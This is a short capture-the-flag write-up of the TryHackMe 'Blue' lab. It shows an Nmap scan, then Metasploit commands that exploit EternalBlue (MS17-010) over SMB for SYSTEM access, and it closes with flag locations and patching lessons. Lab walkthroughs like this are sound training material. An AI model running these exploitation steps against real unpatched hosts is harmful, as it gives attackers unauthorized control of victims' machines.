TryHackMe — Blue

TryHackMe — Blue

January 15, 2025 1 min read TryHackMe Facile
#windows #eternalblue #smb #metasploit

Overview

Blue is an introductory TryHackMe machine that covers the infamous EternalBlue (MS17-010) vulnerability in Windows SMB.

Reconnaissance

We begin with a standard Nmap scan to identify open ports and services.

nmap -sC -sV -oN nmap/blue 10.10.x.x

Key findings:

  • Port 135 — MSRPC
  • Port 139 — NetBIOS
  • Port 445 — SMB (vulnerable)

Exploitation

The machine is vulnerable to MS17-010 (EternalBlue). We use Metasploit to exploit it.

msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.10.x.x
run

Privilege Escalation

EternalBlue gives us SYSTEM-level access directly — no further escalation needed.

Flags

Flag Location
User C:\Users\jon\Desktop\flag.txt
Root C:\Windows\System32\config\flag.txt

Lessons Learned

  • Always patch SMB vulnerabilities
  • EternalBlue remains one of the most critical Windows exploits in history
  • Metasploit simplifies exploitation but understanding the underlying vulnerability is key